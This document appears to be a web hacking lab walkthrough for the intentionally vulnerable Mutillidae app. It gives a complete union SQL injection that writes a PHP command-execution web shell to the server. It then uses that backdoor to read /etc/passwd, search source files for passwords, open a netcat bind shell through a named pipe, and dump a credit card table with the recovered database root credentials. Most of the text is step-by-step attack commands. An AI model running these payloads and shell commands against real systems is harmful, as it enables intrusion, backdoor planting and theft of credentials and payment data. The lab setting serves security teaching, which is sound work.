OWASP Top 10 Web Hacking Final Lab 10 - SQL Injection Union Exploit #3 (Create PHP Execution Script)

{ SQL Injection Union Exploit #3  (Create PHP Execution Script) } OWASP Top 10 Web Hacking Final  Lab 10 Navigate to the User Info Page On BackTrack, Open Firefox Instructions: Click on the Firefox Icon Notes (FYI): If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser Open Mutillidae Notes (FYI): Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3) Instructions: http://192.168.1.111/mutillidae Go to User Info Instructions: OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info Section 9. Inject Backdoor into User Info Page Inspect the Name Textbox with Firebug Instructions: Right click on the Name Textbox Click on Inspect Element Change Text Box Size Instructions: After the string "size=", Change 20 to 100. (See Picture) Click on the Close Button Backdoor Union SQL Union Injection Instructions: In the Name Textbox place the following string.  Remember to put a space after the "-- ". ' union select null,null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form><?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?>' INTO DUMPFILE '/var/www/html/mutillidae/execute_command.php' -- Click the View Account Details button Note(FYI): This above SQL union statement writes a small php script into the following location /var/www/mutillidae/execute_command.php. ' union select null,null,null,null,' - This is the start of SQL union injection statement, that includes the first four fields follow by the start of the fifth field (,'). <form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form> - This is the HTML Form.  Notice that the form action calls itself, since action is assigned to nothing (form action="").  <?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?> - This is the PHP script that execute whatever is placed in the input box (<input type="text" name="CMD") via a system call (shell_exec($_REQUEST["CMD"])). ' INTO DUMPFILE ' - This tells MySQL to place the HTML Form / PHP Script into a file. /var/www/html/mutillidae/execute_command.php - This is the output file. Viewing the Results Note(FYI): This is a typical error message saying either a bad user name or password was supplied. Typically, web designers should not display what caused an error.  In this case, our HTML Form is displayed.  Another practice against web design is not to display the violation that caused the error in the results field.  Section 10. Using the Backdoor for Basic Reconnaissance Initial Reconnaissance Notes (FYI): Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3) Instructions: Place the following URL in the Address Bar http://192.168.1.111/mutillidae/execute_command.php whoami; pwd whoami - Print the effective username. pwd - print name of current/working directory. Click the Execute Command Button Who is Logged On Instructions: w Click the Execute Command Button Notes (FYI): w - Show who is logged on and what they are doing. Instead of letting brutessh attempt default usernames, now you can direct a potential attack at the student user. Exploring /etc/passwd Instructions: cat /etc/passwd Click the Execute Command Button Notes (FYI): /etc/passwd file stores essential information, which is required during login.  The /etc/passwd file contains the following fields:  Username, Password Existance, User ID, Group ID, Gecos, Home Directory, and Shell. Notice that mail, ftp, apache, ssh and mysql are all located in the /etc/passwd file. Network Reconnaissance Instructions: netstat -nao | grep "0.0.0.0:" Click the Execute Command Button Notes (FYI): 3306 - MySQL 22 - SSH 25 - SMTP (Mail) 631 - Internet Print Protocol Section 11. Using the Backdoor for Database Reconnaissance Database Reconnaissance Instructions: find * -name "*.php" | xargs grep -i "password" | grep "=" Click the Execute Command Button Notes (FYI): Find all files that end with a .php that contains the string password AND the string =. Display PHP Script File Instructions: cat classes/MySQLHandler.php | grep -v "<?php" Click the Execute Command Button Notes (FYI): In order to display a PHP script as a text file, you must remove the starting "<?php" tag.  If you do not remove the tag, then the web server will try to run the script instead of displaying the contents. View Database Authentication Attributes Notes(FYI): Username: root Password: samurai Database Name: nowasp Section 12. Using the Backdoor for Netcat Reconnaissance Netcat Reconnaissance Instructions: which nc; netstat -nao | grep 4444 | wc -l Click the Execute Command Button Notes (FYI): which nc, Where netcat located. netstat -nao | grep 4444 | wc -l,  show all network connections for port 4444, and count them. Note, you can run netcat on any port that is not being used. Execute Netcat Instructions: mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe Click the Execute Command Button Notes (FYI): Make a FIFO named pipe.  A FIFO special file (a named pipe) is similar to a pipe, except that it is accessed as part of the file system. It can be opened by multiple processes for reading or writing. When processes are exchanging data via the FIFO, the kernel passes all data internally without writing it to the file system. Thus, the FIFO special file has no contents on the file system, the file system entry merely serves as a reference point so that processes can access the pipe using a name in the file system. Pipes allow separate processes to communicate without having been designed explicitly to work together. This will allow two processes to connect to netcat. nc -l 4444, tells netcat to listen and allow connections on port 4444. On BackTrack, Start up a "another" terminal window Instructions: Click on the Terminal Window Connect to Netcat Notes(FYI): Implement the following instructions on the BackTrack VM Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3). Instructions: nc 192.168.1.111 4444 Use BackTrack to Connect to the Mutillidae Netcat session on port 4444 hostname This is server hostname that hosts Mutillidae. whoami Print the effective UserID. Ie., Who am I connected as. View Credit Card Information Notes(FYI): This step could have also been completed from the Command Execution PHP script. You do not need netcat for this step. Instructions: echo "show databases;" | mysql -uroot -psamurai echo "use nowasp; show tables;" | mysql -uroot -psamurai echo "select * from nowasp.credit_cards;" | mysql -uroot -psamurai Section 13. Proof of Lab Proof of Lab : Hãy quay lại toàn bộ tiến trình thực hiện